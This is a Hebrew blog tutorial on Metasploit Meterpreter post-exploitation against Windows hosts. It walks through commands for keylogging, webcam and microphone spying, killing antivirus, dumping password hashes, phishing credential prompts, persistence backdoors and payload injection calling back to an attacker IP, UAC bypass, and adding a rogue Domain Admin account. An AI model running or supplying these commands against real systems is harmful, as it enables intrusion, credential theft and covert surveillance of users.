Home אבטחת מידעPenetration Testing - Offense פקודות ושימוש ב Metasploit וביצוע Privilege Escalation

פקודות ושימוש ב Metasploit וביצוע Privilege Escalation

by Tal Ben Shushan 27/01/2018 0 comment
פקודות ושימוש ב Metasploit וביצוע Privilege Escalation
נהנתם מהמאמר ? שתפו אותו!

כל הזכויות שמורות לטל בן שושן – Shushan.co.il

פקודות ושימוש ב Metasploit


על מנת לבצע את המאמר, יש לעבור תחילה על המאמרים הבאים:
Kali & Metasploit

התקנת Kali 2017.3
הגדרה ראשונית של Kali והוספת Repository
הסבר הגדרה והפעלת Metasploit
פקודות ושימוש ב Metasploit


במאמר אחר באתר סיקרתי כיצד מפעילים את Metasploit ואך הוא בנוי, כעת נעבור על האפשרויות הקיימות לאחר שהצלחתם להשיג גישת Meterpreter.

כאשר אתם נמצאים בגישת Meterpreter רשמו run

אתם תקבלו רשימה של כל האפשרויות שניתן להריץ ולעבוד איתם, במאמר זה אסקר את כלל האפשרויות

General

meterpreter > run

VNC – על ידי הרצת הפקודה

meterpreter > run vnc

נוכל להפעיל VNC ובכך להשיג שליטה וגישת GUI אל התחנה

כך למעשה אנחנו יכולים לראות מה בדיוק המשתמש עושה

file_collector – הוא למעשה מחפש שמות של קבצים שאתם מחפשים ומציג את מיקומם על ידי יצירת קובץ טקסט ובו כל הנתיבים

meterpreter > run file_collector -r -d c:\\ -f * -o /root/talpcfiles.txt

כעת יצרנו קובץ שסרק את כל הקבצים במחשב ומציג לנו את המיקום, זה מעולה כיוון שכך נוכל לחפש קבצים מסווגים \ סיסמאות או כל דבר אחר שאנחנו מעוניינים בו

checkvm – פקודה זו תציג לנו אם המכונה שהשתלטנו עליה היא למעשה VM או מכונה פיזית

meterpreter > run checkvm

enum_application – מאפשר לנו לבדוק אילו תוכנות \ אפליקציות מותקנות בתחנה

meterpreter > run post/windows/gather/enum_application

enum_logged_on_users – מאפשר לראות מי המשתמש שכעת מחובר למערכת ומי המשתמשים האחרונים שהתחברו

meterpreter > run post/windows/gather/enum_logged_on_users

get_env – מאפשר לנו לקבל מידע על כל המשתמשים במחשב

meterpreter > run get_env

getcountermeasure – בודק אילו הגדרות אבטחה של Windows מופעלות, אם הכל כבוי אז הסיכוי להשיג שליטה במערכת גדולה יותר

meterpreter > run getcountermeasure

killav – אם קיים אנטי וירוס , בתצורה זו הוא ינסה לחסל את התהליך

meterpreter > run post/windows/manage/killav

hostsedit – מוסיף לקובץ ה Hosts רשומה חדשה, כך אתם יכולים לזייף אתר ולהפנות את המשתמש אליו דרך ה Hosts של המחשב שלו

הגדרתי כאן שבכל פעם שהמחשב יפנה לtal.com הוא לא יצליח

meterpreter > run hostsedit -e 127.0.0.1 tal.com

keylogrecorder – מאפשר לבצע KeyLogger ובכך להקליט את כל ההקלדות של המשתמש

meterpreter > run keylogrecorder

panda_2007_pavsrv51 – אם המשתמש מחזיק אנטיוירוס מסוג פאנדה 2006-2007 ניתן לבטל אותו על הפקודה

meterpreter > run panda_2007_pavsrv51 -h

webcam – אם למשתמש יש מצלמת רשת נוכל לבדוק אם יש ולהשתלט לו עליה ולראות מה הוא עושה

meterpreter > run post/windows/manage/webcam

enable_rdp – מצב זה גורם לRDP במחשב שתקפנו לפעול אם היה מנוטרל

כך זה נראה לפני:

נקיש את הפקודה

meterpreter > run post/windows/manage/enable_rdp

התוצאה כעת

הבחינו שהוא גם פתח חוק בפיירוואל שפותח את 3389

ניתן לפתוח RDP אל התחנה ובכך לשלוט בה

תחילה נבצע Relay Port  שאומר שפורט 3389 יגיע לקאלי מהתחנה שאותה התקפנו

תחילה כמו בסעיף למעלה נאפשר RDP

כעת נבצע את הRelay לפורט

וכעת נקיש

background

ואז את הפקודה

yum install rdesktop

rdesktop 192.168.31.150

192.168.31.150 זה המטרה שאליה יש לנו גישה

To return the session

session -i 1

 hashes & Passwords

hashdump – מאפשר לנו לקבל את ה Hash של המשתמשים

meterpreter > hashdump

credcollect – מאפשר לנו לקבל את ה Hash של המשתמשים במחשב ואת ה Tokes עצמם

meterpreter > run credcollect

powerdump – מוציא את כל המשתמשים במחשב ואת ה Hashs שלהם, על ידי כך נוכל לנסות לקבל את הסיסמא של מנהל המחשב \ משתמש במחשב

meterpreter > run powerdump

scraper – משיג את ה Password Hashs של המשתמשים במחשב ומוריד את כל ה registry של המחשב

meterpreter > run scraper

phish_windows_credentials – המשתמש פתאום מקבל חלון Powershell שמבקש ממנו להזין את הסיסמא שלו, סיכוי גדול שהוא יקיש את שם המשתמש והסיסמא שלו ובכך נקבל אותם

meterpreter > post/windows/gather/phish_windows_credentials

sso – פיצ’ר זה ינסה לקבל את הסיסמא של המשתמש על ידי שימוש במנגנון ה Single Sign On

meterpreter > post/windows/gather/credentials/sso

BackDoors

metsvc – נאמר ואתם רוצים ליצור backdoor ובכך ליצור מצב שאם אתם מתנתקים מהמחשב ואותו מחשב עלול להתקין פתאום עדכונים או לחסום את הפריצה אז אנחנו יוצרים backdoor

meterpreter > run metsvc

ניתן לראות שהשירות קיים במחשב, ניתן להקיש את הפקודה

meterpreter > ps

multi_meter_inject – מצב נוסף שבו אתם יכולים ליצור Backdoor הוא להזריק את ה Payload אל תוך תהליך בזיכרון שהמשתמש לא יבחין בו כמו notepad.exe

192.168.1.100 – הכתובת שלכם של קאלי

meterpreter > run multi_meter_inject -I 192.168.1.100

ניתן לראות שהPID של התהליך הוא 1844

כעת נבדוק אילו תהליכים רצים במחשב ואיפה הPID הזה

presistence – גם זה יוצר לנו Backdoor הוא מגדיר Payload שתמיד רץ ובכך מאפשר לנו לחזור למערכת בקלות, חשוב רק לזכור את הכתובת IP של התחנה שלכם + הפורט בו הוא פתח את ה Backdoor בשביל לחזור חזרה כאשר אנחנו מעוניינים, התהליך שהוא יוצר נקרא cscript

meterpreter > run presistence

כאן ניתן לראות את התהליך

payload_inject – עוד Backdoor

meterpreter > run post/windows/manage/payload_inject lhost=192.168.1.135

scheduleme – לא הצגתי את כל התהליך אבל פיצ’ר זה מאפשר להריץ סקריפט במערכת או אפילו קובץ exe ובכך ליצור backdoor או להריץ תוכנת ransomware בזמן מסוים

meterpreter > run scheduleme -h

screenspy – יקח תמונות מסך כל X זמן וכך ניתן לבצע מעקב אחר התחנה

meterpreter > run screenspy -h

search_dwld – מאפשר לבצע חיפוש לקבצים ואוטומטית הוא יוריד אותם אל ה KALI שלכם

meterpreter > run search_dwld -h

service_manager -h – מאפשר ניהול של שירותים בתחנה שהשתלטנו עליה, כמו לכבות שירותים שלא יעלו בהפעלה הבאה להציג את כל השירותים במחשב וכו’

meterpreter > run service_manager -h

sound_recorder – אם קיים מיקרופון בתחנה מאפשר להקליט את כל המתרחש

meterpreter > run sound_recorder -h

uploadexec – מאפשר לעלות סקריפט או קובץ exe ולהריץ אותו מידיית אצל המשתמש

meterpreter > run uploadexec -h

virusscan_bypass – מאפשר לעקוף את האנטי וירוס של מקפי בגרסה 8.7.0

meterpreter > run virusscan_bypass -h

ms10_073_kbdlayout – משתמש באחד ה Exploits של Stuxnet המפורסם על מנת לנסות לקבל גישה גבוהה יותר

meterpreter > post/windows/escalate/ms10_073_kbdlayout

droplnk – מייצר קיצור דרך שמפעיל את SMB ויוצר שיתוף של הקבצים במחשב

meterpreter > run post/windows/escalate/droplnk lhost=192.168.1.135

Privilege Escalation

use incognito – פיצ’ר המאפשר לקבל אילו משתמשים קיימים במערכת ולבצע פונצקיות נוספות כמו, מי המשתמשים

list_tokens -u – מציג לכם את כל המשתמשים שניתן להשתמש בהרשאות שלהם

meterpreter > use incognito

meterpreter > list_tokens -u

כעת נוכל להשתמש בהרשאות של Administrator

impersonate – בפקודה זו נשתמש בהרשאות של מנהל המערכת

meterpreter > impersonate_token9 tal\\administrator

כעת יש לנו את ההרשאות הכי גבוהות במחשב

getuid – מציג את המשתמש המחובר כעת למערכת

meterpreter > getuid

bypassuac – אחד הבעיות הקיימות כאשר השגנו גישת meterpreter לתחנה זה ה UAC – ה User Account Control ואפשר לבטל אותו על ידי שימוש ב Exploit, כמובן שחייב להיות מחובר בגישת meterpreter אל התחנה

נלחץ Ctrl + Z או נרשום Background

meterpreter > background

נרשום

msf exploit(handler) > use exploit/windows/local/bypassuac

msf exploit(bypassuac) > set session 1

כעת נריץ Exkerploit

מעולה! הצלחנו לבטל את UAC

Net use – אם אתם מחוברים למשתמש בארגון – מנהל הארגון או משתמש עם מספיק הרשאות, ניתן להוסיף משתמשים וקבוצות ב Active Directory

נעבור לCMD על ידי הפקודה

meterpreter > shell

כעת אנחנו ב

c:\Windows\System32>

ואז נוסיף משתמש חדש לדומיין על ידי הפקודה

c:\Windows\System32> net user tal2admin Pa$$w0rd /add /domain

כעת נוסיף את המשתמש לקבוצת Domain Admins

c:\Windows\System32> net groups “Domain Admins” tal2admin /add /domain

לצורך הבדיקה נבדוק אם אכן הוא הוסיף, נבדוק ב Active Directory בדומיין

Domain Level

קיימים גם פקודות ברמת Domain וניתן לבצע אותם בסביבת דומיין בלבד

ניתן לנסות לקבל פרטי משתמש וסיסמא אם המשתמש שמר את סיסמתו באחת מהתוכנות הבאות

הפקודות הן

meterpreter > post/windows/gather/credentials/The name of the feature

מאמרים קשורים

Leave a Comment